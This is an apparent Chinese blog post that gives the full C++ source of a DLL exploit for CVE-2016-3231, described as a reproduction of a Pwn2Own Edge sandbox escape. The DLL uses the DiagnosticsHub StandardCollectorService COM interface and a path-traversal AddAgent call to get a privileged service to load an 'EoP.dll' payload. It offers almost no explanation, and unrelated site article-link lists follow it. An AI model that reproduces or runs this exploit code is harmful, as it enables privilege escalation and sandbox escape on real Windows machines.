CVE-2016-3231
2024-10-20 05:33:12
摘要:重现了下韩国小哥Lokihardt在pwn2own上的过沙箱提权漏洞。
1 #include <windows.h>
2 #include <atlbase.h>
3 #include "DiagnosticsHub.StandardCollector.Runtime_h.h"
4
5 BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
6 {
7 switch (ul_reason_for_call)
8 {
9 case DLL_PROCESS_ATTACH:
10 {
11 WCHAR user_name[MAX_PATH] = { 0 };
12 DWORD name_size = sizeof(user_name);
13 GetUserName(user_name, &name_size);
14
15 CoInitialize(0);
16
17 HRESULT hr;
18 CLSID clsid_hub;
19 IID iid_IStandardCollectorService;
20 IStandardCollectorService * i_StandardCollectorService;
21
22 CLSIDFromString(L"{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}", &clsid_hub);
23 CLSIDFromString(L"{0D8AF6B7-EFD5-4F6D-A834-314740AB8CAA}", &iid_IStandardCollectorService);
24
25 hr = CoCreateInstance(clsid_hub, NULL, CLSCTX_LOCAL_SERVER, iid_IStandardCollectorService, (LPVOID*)&i_StandardCollectorService);
26 if (FAILED(hr))
27 {
28 printf("CoCreateInstance failed: %08x\n", hr);
29 }
30
31 SessionConfiguration session_config;
32 ICollectionSession * i_CollectionSession = { 0 };
33 WCHAR scratch_path[MAX_PATH] = { 0 };
34
35 wsprintf(scratch_path, L"C:\\Users\\%ws\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp", user_name);
36 session_config.Type = CollectionType_Etw;
37 session_config.Location = CollectionLocation_Local;
38 session_config.Flags = SessionConfigurationFlags_None;
39 session_config.LifetimeMonitorProcessId = 0;
40 session_config.SessionId = {};
41 session_config.CollectorScratch = CComBSTR(scratch_path);
42 session_config.ClientLocale = 0;
43
44 hr = i_StandardCollectorService->CreateSession(&session_config, nullptr, &i_CollectionSession);
45 if (FAILED(hr))
46 {
47 printf("CreateSession failed: %08x\n", hr);
48 }
49
50 WCHAR dll_path[MAX_PATH] = { 0 };
51 GUID guid = GUID_NULL;
52
53 //wsprintf(dll_path, L"..\\..\\..\\..\\Users\\%ws\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\EoP.dll", user_name);
54 wsprintf(dll_path, L"..\\..\\..\\..\\Users\\%ws\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\EoP.dll", user_name);
55 hr = i_CollectionSession->AddAgent(dll_path, &guid);
56 if (FAILED(hr))
57 {
58 printf("AddAgent failed: %08x\n", hr);
59 }
60
61 break;
62 }
63 case DLL_THREAD_ATTACH:
64 break;
65 case DLL_THREAD_DETACH:
66 break;
67 case DLL_PROCESS_DETACH:
68 break;
69 }
70
71 return TRUE;
72 }
最新文章
- 使用WebRTC搭建前端视频聊天室——数据通道篇
- Hybrid APP混合开发的一些经验和总结
- day 2 Linux目录结构
- 【SAP Business Objects】Universe中的@prompt语法
- 水题 ZOJ 3876 May Day Holiday
- 如何从SAP中查找BADI
- wordpress整站搬家总结
- jQuery操作cookie
- 线段树:Segment Tree(单点修改/区间修改模板) C++
- python高级编程之元类(第3部分结束)
- mmtests使用简介
- NetCore1.1+Linux部署初体验
- Linux网络编程“惊群”问题总结
- cglib根据数据动态生成对象
- error: can't copy 'docx\templates\default-docx-template': doesn't exist or not a regular file --------------- Failed building wheel for python-docx; python-docx的安装使用;python操作word
- 12.Redis运维点
- 【转】Windows系统中ckplayer视频边下边放,视频转码mp4及"last atom in file was not a moov atom"问题
- base64加密图片处理
- mysql5.6基于主从复制的mmm高可用架构详解
- 【30集iCore3_ADP出厂源代码(ARM部分)讲解视频】30-8底层驱动之RTC
热门文章
- Python openpyxl Read
- IDEA里运行代码时出现Error:scalac: error while loading JUnit4, Scala signature JUnit4 has wrong version expected: 5.0 found: 4.1 in JUnit4.class错误的解决办法(图文详解)
- Request笔记
- ExtJs6自定义scss解决actionColum中iconCls图标不能调样式的问题
- [转]象棋AI算法(一)
- Win7 开机启动
- windows 下配置ndk环境,无需cygwin
- Expression Blend实例中文教程(4) - 布局控件快速入门Canvas
- SSH框架整合中Hibernate实现Dao层常用结构
- IntelliJ IDEA 快捷键(一)(window版)